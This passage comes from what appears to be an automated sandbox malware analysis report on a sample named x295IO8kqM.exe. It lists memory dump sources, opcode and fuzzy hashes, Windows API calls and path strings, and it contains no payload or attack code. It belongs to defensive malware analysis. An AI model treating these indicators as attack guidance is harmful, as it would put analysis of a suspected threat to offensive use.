                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                  • Instruction ID: de30b2b7089f6fefb08e10281d0b4b3c30be484ea7ef601637de59f0c5b2ee24
                                                  • Opcode Fuzzy Hash: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                  • Instruction Fuzzy Hash: 18015E71A0060CABDF216F11DD80B9B3A26EB94354F104036FA05792D2C3BA8C929B6D
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,76CF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037A6,004035BC,?), ref: 004037E8
                                                  • GlobalFree.KERNEL32(?), ref: 004037EF
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004037CE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3355392842
                                                  • Opcode ID: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
                                                  • Instruction ID: fd5cce2495c6c1b199366fa48a4731a267e7b28c4e3a2e6049d666ad51adf226
                                                  • Opcode Fuzzy Hash: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
                                                  • Instruction Fuzzy Hash: F3E0C2B39040305BC7216F14EC4471AB7A86F88B32F058126F8817B3A087742C924FD8
                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003,?,?,"C:\Users\user\Desktop\x295IO8kqM.exe",00403500,?), ref: 00405A20
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003,?,?,"C:\Users\user\Desktop\x295IO8kqM.exe",00403500,?), ref: 00405A30
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3370423016
                                                  • Opcode ID: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
                                                  • Instruction ID: 6345b2d933a2ce4686671ca67b85a4373090522c5e7ae7861229ca93a50cc92f
                                                  • Opcode Fuzzy Hash: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
                                                  • Instruction Fuzzy Hash: 95D05EB2521A309BC312AB08DC4199F63ACEF223057468426F441A61A0D3785C808AB9
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B7C
                                                  • CharNextA.USER32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B8D
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                  • Instruction ID: 09ddfbf6a96cc3af2c4d2f748c9cef087a74b3384d996a5f3154f8737d8de66f
                                                  • Opcode Fuzzy Hash: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                  • Instruction Fuzzy Hash: 86F0C231904514EFC7129FA5CC00D9FBBB8EF06350B2540A5E800F7351D634FE019BA9